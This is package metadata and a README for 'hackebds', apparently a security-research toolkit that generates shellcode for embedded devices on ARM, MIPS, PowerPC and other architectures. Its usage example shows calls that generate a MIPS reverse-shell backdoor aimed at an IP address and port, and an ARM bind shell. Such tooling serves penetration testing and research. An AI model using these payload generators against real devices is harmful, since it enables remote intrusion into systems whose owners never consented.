Metadata-Version: 2.1
Name: hackebds
Version: 0.4.0
Summary: A security research toolkit for embedded device shellcode generation and vulnerability analysis
Author-email: doudou <your-email@example.com>
License: MIT
Project-URL: Homepage, https://github.com/doudoudedi/
Project-URL: Repository, https://github.com/doudoudedi/hackEmbedded
Project-URL: Issues, https://github.com/doudoudedi/hackEmbedded/issues
Keywords: security,embedded,shellcode,vulnerability,pwntools,IoT
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: Intended Audience :: Information Technology
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Operating System :: POSIX :: Linux
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: pwntools
Requires-Dist: colorama
Requires-Dist: requests

# hackebds

A security research toolkit for embedded device shellcode generation and vulnerability analysis.

## Features

- Multi-architecture shellcode generation (ARM, MIPS, PowerPC, SPARC, AArch64)
- Reverse shell and bind shell payloads
- Firmware analysis tools
- CVE vulnerability database
- Integration with pwntools

## Installation

```bash
pip install hackebds
```

## Usage

```python
import hackebds

# Generate MIPS reverse shell
shellcode = hackebds.mips_backdoor("192.168.1.1", 4444)

# Generate ARM bind shell
shellcode = hackebds.bindshell_arm(4444)
```

## Command Line

```bash
hackebds --help
```

## Requirements

- Python >= 3.8
- pwntools
- colorama

## License

MIT License
